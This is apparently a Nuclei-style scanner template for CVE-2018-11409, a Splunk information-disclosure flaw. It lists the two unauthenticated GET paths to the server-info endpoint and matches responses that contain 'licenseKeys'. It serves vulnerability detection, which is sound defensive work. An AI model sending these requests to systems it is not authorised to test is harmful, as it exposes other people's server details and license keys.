id: cve-2018-11409 info: name: Splunk Sensitive Information Disclosure author: Harsh Bothra severity: medium # source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409 requests: - method: GET path: - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - licenseKeys